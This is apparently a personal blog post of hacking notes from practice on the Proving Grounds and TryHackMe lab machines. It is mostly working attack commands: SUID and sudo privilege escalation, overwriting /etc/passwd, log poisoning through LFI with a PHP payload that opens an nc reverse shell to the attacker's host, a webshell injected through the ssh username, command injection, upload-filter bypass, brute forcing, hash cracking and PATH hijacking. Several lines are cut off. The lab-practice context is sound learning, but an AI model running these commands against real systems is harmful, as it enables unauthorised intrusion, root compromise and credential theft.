I spent most of 2021 either racing mountain bikes, training to race or hacking virtual machines on Offensive Computing’s Proving Grounds or TryHackMe.com.
Here are some random tactics I picked up along the way.
Enjoi!
Greg
– If you ever see /usr/bin/bash with SUID bit set, run bash -p to get root. How is that even possible?
– Search for SUID bits set on binaries you can execute as root for priv escalation
– Search for id_rsa, private certs with which you can escalate privileges.
– Scan robots, dirb directories, html/php source code for usernames or passwords or base64 strings you can decode
– Add some of these to a script you can paste into a system to find recursively for such SUID files and certs or other.
– Be alert for potential usernames anywhere, base64 encoded strings, robots, html/php/other code strings. Usernames!
– Try ssh-ing/ftp-ing into boxes with found usernames and potential passwords or hydra the services for brute force access./
– You can ssh back into a box with private keys (id_rsa), root at best.
– It’s possible to sudo wget a file with root privs for any file without the root password.
– Linux lets us authenticate using a password that’s in /etc/passwd as well as /etc/shadow
– Key command was while logged on as unpriv user $sudo wget 1.2.3.4/passwd -O /etc/passwd then su to root
– You can generate passwords like those in /etc/shadow using mkpasswd command.
– searchsploit [keyword] to find vulns or search CVEs or exploithub or wherever. Use against local or remote
– nc -lvp 4444 to setup nc listener for the target to connect back to you on as with a python reverse shell.
– Check /tmp for fishiness. Stuff gets placed there by attackers b/c it’s world writeable.
– If you’re ssh-ed in, paste linenum.sh into the box and run it to gather local intel. Great tool./
– Check /etc/crontab to see what processes are running out of the ordinary. Can contain passwords in scripts set to run.
– Swap out (If possible) scripts which run as root from crontab with your own like add you to gid0 or create a new account with creds you set.
– You can call into a server with bad php: http://192.168.175.72:8593/?
– Entries in /etc/crontab can be hidden from view depending on crlf or end of line entry. Reveal by pasting into vi or other editor
– Check gobuster.out for interesting hidden directories or filenames. like /secret or whatever
– Always try default credentials like admin/admin, root/toor etc. Or google search for default creds for the software you’re seeing.
– Try SQL vuln elicit with: ‘ or 1=1; — or http://192.168.120.224/store/
– .php files let you add strings onto the end of URLs for command injection or like cat /etc/shadow and if web service is running as root, it works.
– Try sqlmap -u http://1.2.3.4/secret.php?
– Connect with mysql or do password guessing with hydra or medusa
– show databases; show tables; show * where X is that…. Find pass database for hashes to crack with john or crackstation
– LFI – Local File Include is where we somehow upload files then call them and they get executed with privs of the web service account like apache.
– shodan catalogs the hashes of favicons and you can search by hash to see which sites are using your favicon or which are scam sites.
– Like, $cp /usr/share/webshells/php/php-
– If you try to get the robots.txt file and it says no b/c you’re not a search engine, curl supports delcaring your browser strings to be a permitted search engine.
– Find / |grep pass to search the entire system for password files or smiliar. Pivot!
– Don’t forget to pivot to other boxes on the remote network, if it exists.
– If you see a random blob of characters, look closely in it to find patterns which could be usable like aaAdDdddd”password”
– While this file only seems to contain random text at first sight, we can identify some important parts between double quotes.
– Be alert for chunks of strings of characters when strung together may be a hash or base64 encoding. Deception VM on PG had 3 separate lines of code
appearing in different lines. The expectation was that we string then back together for the SSH password. Username found in wpscan vs wordpress.
– In metasploit, searchsploit to find exploit, then $cp /usr/share/exploitdb/platform/
– $sudo -l to enumerate what the user is able to on a ssh term. sudo -l lists paths with potential suid bits set to run with root privs.
– /usr/bin/time /bin/sh for priv escalation. Maybe script a bunch of those to execute to attempt priv escalation
– Using a SUID binary, try:
$LFILE=/etc/shadow
$sudo /usr/bin/SUID-BINARY –raw -F “$LFILE”
$Failed to resolve host yet still dumps /etc/shadow for cracking
– dirb http://192.168.0.27 -X .zip (Find files with this eXtension)
– LFI with http://192.168.120.170/
– Dirb can reveal useful php or directories for these LFI attempts.
– View for poisoning auth.log: 192.168.1.129/lfi/lfi.php?
– ssh ‘<?php system($_GET[‘cmd’]); ?>’@192.168.120.170 [See how that tacks some command injection string into the ssh command
– Navigating to manipulated URLs can cause the web server to execute files you uploaded in the LFI and reconnect back to you for remote shell.
– Check your privileges, whatever they are. If you can compromise a seemingly unpriv-ed account, you may have access to things like services or ?
– $sudo -l (List privs) Responds with “you may run the following commands
– If your shell seems constricted by chroot or you have no path statements, you can /usr/bin/ls (absolutes) or make path statements
– Escalation: You can pipe scripts into binaries includig nmap involving /bin/sh
$TF=$(mktemp) – for example
echo ‘os.execute(“/bin/sh”)’ >$TF
sudo -u root nmap –script=$TF
This executes the shell as the root privs you got from nmap.
– If you’re in a restricted shell, try $bash –noprofile. Seems to clear that up.
– If you’re stuck on some unknown port with no identifiable service, try fuzzing:
– sfuzz -S 192.168.1.1 -p 10443 -T -f /usr/share/sfuzz/sfuzz-sample/
Misc Linux Hacknotes:
– /var/ftp/ is the default location for ftp files you upload so you can call a php reverse shell. Wrote to /var/ftp/pub/ on inclusiveness
– /etc/passwd can actually contain hashes. Crack when found
– gobuster or dirb to brute force hidden directories or objects. Good for finding web objects for uploading files for remote code execution
– wordlists on kali are stored in /usr/share/wordlists/
– start netcat listener with #nc -nvlp [port], usage #nc -nvlp 4444
– Kali stores webshells here /usr/share/webshells. Notably, like php-reverse-shell.php. Edit for usage top 10 lines
– When guesing passwords, try the username as a pass, or use cewl to augment wordlists for hydra brute forcing
– #tshark is like tcpdump
– Use apt list –installed to see what’s installed in debian
– If you have a web form and have restrictions on input, you can base64 encode the input and have the remote system decode and execute it:
– 127.0.0.1 | echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2
– If you decode this string, you’ll see that it is a reverse shell back to tcp/80
– Use the stat command to view extended file info
– you can hide /etc/crontab services with a eol/crlf character. View hidden ones with $hexeditor
– use dpkg –list to view installed apps
– tail -f /var/log/syslog shows repeated errors with the expressvpn.service daemon
– /etc/systemd/system/
– #systemctl stop expressvpn.service seems to have killed it
– #systemctl disable expressvpn.service
– Response: Removed /etc/systemd/system/multi-
– Errors in /var/log/syslog for expressvpn ended
– systemctl status expressvpn.service
– Imagine a captcha is stopping you from logging in, view source, find captcha.php and sometimes the value is in the source code. Duh.
– git clone http://github.com/openwall/
– From there, cd into john/src, ./configure, make, make install
– Didn’t seem to run right but that’s how you do that. Didn’t put anything into my path to execute though.
– zip2john is a password cracker for zip files. Don’t have to brute force those.
– In /etc/passwd a default shell of /bin/rbash means restricted bash.
– You’d have to escape that but you can run software outside your path so that will be easy.
– Try ssh username@1.2.3.4 -t “bash –noprofile” and try using full paths to binaries like /usr/bin/cat or whatever (Worked)
– Get attackable VMs from :https://www.vulnhub.com/
– You can ‘strings’ binaries looking for ASCII characters to gether intel about the file
– $ls -al /tmp to see what’s going on in there. Got a base64 string from a tmp file I opened
– #chkrootkit to check for rootkit activity or evidence
– responder.py listens on the local network for LLMNR – Local Link Multicast Name Resolution broadcasts and gathers up hashes for local cracking and reuse
– – Search for vulns in metasploit. Example msf >use auxiliary/admin/http/wp_
– Check for ability to upload and execute files via url like http://1.2.3.3/upload_dir/
– If TCP/3306 is open, it’s MySQL. You can connect with #mysql -u root -p -h 1.2.3.3 and dig for usernames/passes.
– Base64 encoding: if you see a string of text like this ‘Sld6WHVCSkpOeQ==’, it may be base64 encoded
– echo ‘Sld6WHVCSkpOeQ==’ |base64 -d (or –decode)
– Sometimes passwords are hidden in plain sight.
– Other times, a pass hash looks like $P$
– Save to hashfile.txt and $john hashfile.txt to crack it.
– If you find passes anywhere, try logging in anywhere with them to escalate privileges.
– In a ls command, check file ownership for usernames or /etc/password or /home/username
– Make copies of files while you have root shell and chmod 666 them so you don’t lose access.
– LFI – Local File Include:
– http://192.168.120.45/?page=
– This says “hey server, open this file I have. More on offensive-security.com. Study./
– Practice on DVWA.
– Check all web content to which you have access. One VM had admin credentials in cleartext.
– If you’re restricted to uploading file types like only .jpg or .png, simply rename a .php to .jpg to upload and
execute for reverse shell.
– Search metasploit for specific version numbers of software to attack. Searchsploit
– Once disovered:
msf > nmap -Pn -sS -A oX target_db 1.2.3.0/24 or 1.2.3.4
msf > db_import target_db
msf > hosts (to view hosts in the target_db)
msf > db_nmap -sSV -A 1.2.3.4 (Targets from target_db)
– If you find a place to upload files, upload php reverse shells, then call them via URL:
– First, start reverse shell with netcat with #nc -lvp 4444 (Any IP on 4444)
– Some VMs have file upload ability, then call via web browser
– http://192.168.120.30/
– Webshells are stored in /usr/share/webshells
– Notably php-reverse-shell.php
– Once you run the shell on the webserver, it connects back, then escalate privs.
– find / |grep txt or root or flag or whatever file anywhere on the filesystem
– Navigating to http://192.168.120.30/flag/ can grant a flag.
msf > search CVE:2008:9798 – Shows you the exploit. Select with the number next to it like msf > use 0
– Regex to find valid IP Address: ((2[0-5]{2})|(1*[0-9]{1,2}))(\
– amap can find services running on non-standard ports. E.g., when ssh is running on tcp/655335
– More on Kali MiniBox puter
– Format nikto output for msf import and use #nikto -h 1.2.3.4 -Format msf+
– Binaries with S bit set with #chmod +s /bin/bash are executed with root privs so that (!) $bash -p results in uid0 (root)
– nmap -p- -T4 –top-ports=5000 1.2.3.4 (Scan top 5000 ports)
– $ openssl passwd -1 -salt hack pass123
$1$hack$22.CgYt2uMolqeatCk9ih/
– zip2john is hugely faster than fcrackzip, massively.
– sqlmap.py -u “http://www.site.com/section.
– sqlmap -u http://192.168.75.72/index.php
– Searchsploit searches exploit-db for sploits from a cmdline. Isn’t related to msf>
– echo “GET <?php echo ‘TEST123’ ?> HTTP/1.1” | nc 192.168.189.72 80
– Dumps
– Poison the webserver logs with script, then call the access.log with curl! wow!
– $echo “GET <?php system(‘nc -e /bin/bash 192.168.118.9 444’); ?> HTTP/1.1” | nc 192.168.175.72 80
– First, start our listener with #nc -nvlp 444
– Then trigger it with the LFI.
– $curl http://192.168.175.72:8593?
– We receive our shell.
– If you have shell on a box, check permissions on web files to see if you have write access to like index.php. Change it to escalate privs.
– If you can’t find the flag, do a #search / |grep \.txt and sort by date to find a recently-edited text file flag. dafe5f0c961a70c32fd1721cb99c77
– If a site you’re working calls out to a non-existant domain, you can put an entry back to you on /etc/hosts so the site works. Worked on Proving Grounds Loly
– this is important and I’ve seen it on two engagements:
– The initial IP works but referer links points to some non-existant domain or localhost.
– Put an /etc/hosts entry for localhost to 192.168.X.X or whatever the target server is.
– Sweet set of password files for cracking her: /usr/share/seclists/Passwords/
– Contains leaked actual passwords
– curl -s http://192.168.53.34 | grep API = It’s a thing. Look into it.
ffuf -w names.txt -u http://192.168.116.14/ -H “Host: FUZZ” -mc 200 fuzz fuzzer
fix your limited shell with $python -c “import pty; pty.spawn(‘/bin/bash’)”
fix your limited shell with $python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Find binaries with the suid bit set:
suid #find / -perm -u=s -type f 2>/dev/null
suid #find / -perm -4000 2> /dev/null
There are secure path statements where dangrous files aren’t executed AND you can edit your path statement so stuff you want gets executed first.
Add like /tmp to your path statement to execute your malware before legitimate /usr/bin/ls or whatever.